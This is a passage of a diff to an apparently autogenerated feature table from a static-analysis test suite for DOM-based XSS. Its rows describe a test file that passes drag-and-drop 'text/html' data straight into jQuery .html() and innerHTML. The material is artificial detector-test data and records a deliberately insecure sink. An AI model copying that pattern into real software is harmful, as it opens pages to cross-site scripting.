drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:53 | exceptional return of e.dataT ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:53 | exceptional return of e.dataT ... /html') | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:53 | exceptional return of e.dataT ... /html') | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:53 | exceptional return of e.dataT ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:21:29:32 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:21:29:32 | dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:21:29:32 | dataTransfer | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:21:29:32 | dataTransfer | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:21:29:32 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:34:29:40 | getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:34:29:40 | getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:34:29:40 | getData | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:34:29:40 | getData | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:34:29:40 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:42:29:52 | 'text/html' | CalleeFlexibleAccessPath | e.dataTransfer.getData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:42:29:52 | 'text/html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:42:29:52 | 'text/html' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13488,21 +99993,97 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:42:29:52 | 'text/html' | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:42:29:52 | 'text/html' | enclosingFunctionName | document.addEventListener#functionalargument | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:42:29:52 | 'text/html' | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:32:1 | $ | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:32:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:32:1 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:32:9 | $("#foo") | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:32:9 | $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:32:9 | $("#foo") | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:32:9 | exceptional return of $("#foo") | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:32:9 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:32:9 | exceptional return of $("#foo") | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:32:14 | $("#foo").bind | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:32:14 | $("#foo").bind | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:32:14 | $("#foo").bind | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:34:2 | $("#foo ... T OK\\n}) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:34:2 | $("#foo ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:34:2 | $("#foo ... T OK\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:34:2 | exceptional return of $("#foo ... T OK\\n}) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:34:2 | exceptional return of $("#foo ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:1:34:2 | exceptional return of $("#foo ... T OK\\n}) | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:3:32:8 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:3:32:8 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:3:32:8 | "#foo" | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:3:32:8 | "#foo" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:3:32:8 | "#foo" | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:11:32:14 | bind | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:11:32:14 | bind | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:11:32:14 | bind | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:16:32:21 | 'drop' | CalleeFlexibleAccessPath | $().bind | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:16:32:21 | 'drop' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:16:32:21 | 'drop' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:16:32:21 | 'drop' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:16:32:21 | 'drop' | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | 'arguments' object of anonymous function | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | 'arguments' object of anonymous function | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | 'arguments' object of anonymous function | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | (e) => ... OT OK\\n} | CalleeFlexibleAccessPath | $().bind | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | (e) => ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | (e) => ... OT OK\\n} | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | (e) => ... OT OK\\n} | contextSurroundingFunctionParameters | (e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | (e) => ... OT OK\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | exceptional return of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | exceptional return of anonymous function | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | exceptional return of anonymous function | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | return of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | return of anonymous function | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | return of anonymous function | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:24:34:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:25:32:25 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:25:32:25 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:25:32:25 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:25:32:25 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:25:32:25 | e | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:25:32:25 | e | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:25:32:25 | e | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:25:32:25 | e | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:25:32:25 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:32:25:32:25 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:5 | $ | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:5 | $ | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:5 | $ | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:5 | $ | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:5 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:12 | $("#id") | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:12 | $("#id") | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:12 | $("#id") | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:12 | $("#id") | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:12 | $("#id") | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:12 | exceptional return of $("#id") | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:12 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:12 | exceptional return of $("#id") | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:12 | exceptional return of $("#id") | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:12 | exceptional return of $("#id") | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:17 | $("#id").html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:17 | $("#id").html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:17 | $("#id").html | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:17 | $("#id").html | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:17 | $("#id").html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:68 | $("#id" ... html')) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:68 | $("#id" ... html')) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:68 | $("#id" ... html')) | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:68 | $("#id" ... html')) | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:68 | $("#id" ... html')) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:68 | exceptional return of $("#id" ... html')) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:68 | exceptional return of $("#id" ... html')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:68 | exceptional return of $("#id" ... html')) | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:68 | exceptional return of $("#id" ... html')) | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:5:33:68 | exceptional return of $("#id" ... html')) | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:7:33:11 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:7:33:11 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:7:33:11 | "#id" | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13510,6 +100091,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:7:33:11 | "#id" | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:7:33:11 | "#id" | enclosingFunctionName | bind#functionalargument | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:7:33:11 | "#id" | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:14:33:17 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:14:33:17 | html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:14:33:17 | html | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:14:33:17 | html | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:14:33:17 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:19 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:19 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:19 | e | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:19 | e | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:19 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:33 | e.originalEvent | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:33 | e.originalEvent | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:33 | e.originalEvent | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:33 | e.originalEvent | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:33 | e.originalEvent | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:46 | e.origi ... ransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:46 | e.origi ... ransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:46 | e.origi ... ransfer | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:46 | e.origi ... ransfer | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:46 | e.origi ... ransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:54 | e.origi ... getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:54 | e.origi ... getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:54 | e.origi ... getData | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:54 | e.origi ... getData | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:54 | e.origi ... getData | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13517,6 +100123,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | enclosingFunctionName | bind#functionalargument | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:67 | exceptional return of e.origi ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:67 | exceptional return of e.origi ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:67 | exceptional return of e.origi ... /html') | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:67 | exceptional return of e.origi ... /html') | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:19:33:67 | exceptional return of e.origi ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:21:33:33 | originalEvent | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:21:33:33 | originalEvent | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:21:33:33 | originalEvent | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:21:33:33 | originalEvent | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:21:33:33 | originalEvent | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:35:33:46 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:35:33:46 | dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:35:33:46 | dataTransfer | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:35:33:46 | dataTransfer | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:35:33:46 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:48:33:54 | getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:48:33:54 | getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:48:33:54 | getData | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:48:33:54 | getData | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:48:33:54 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:56:33:66 | 'text/html' | CalleeFlexibleAccessPath | e.originalEvent.dataTransfer.getData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:56:33:66 | 'text/html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:56:33:66 | 'text/html' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13524,6 +100150,78 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:56:33:66 | 'text/html' | enclosingFunctionBody | e $ #id html e originalEvent dataTransfer getData text/html | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:56:33:66 | 'text/html' | enclosingFunctionName | bind#functionalargument | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:33:56:33:66 | 'text/html' | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:1:56:2 | (functi ... }\\n}) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:1:56:2 | (functi ... }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:1:56:2 | (functi ... }\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:1:56:4 | (functi ... }\\n})() | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:1:56:4 | (functi ... }\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:1:56:4 | (functi ... }\\n})() | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:1:56:4 | exceptional return of (functi ... }\\n})() | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:1:56:4 | exceptional return of (functi ... }\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:1:56:4 | exceptional return of (functi ... }\\n})() | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:36:1 | this | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:36:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:36:1 | this | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:36:1 | this | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:36:1 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | 'arguments' object of anonymous function | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | exceptional return of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | exceptional return of anonymous function | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | functio ... }\\n} | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | functio ... }\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | functio ... }\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | return of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | return of anonymous function | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text 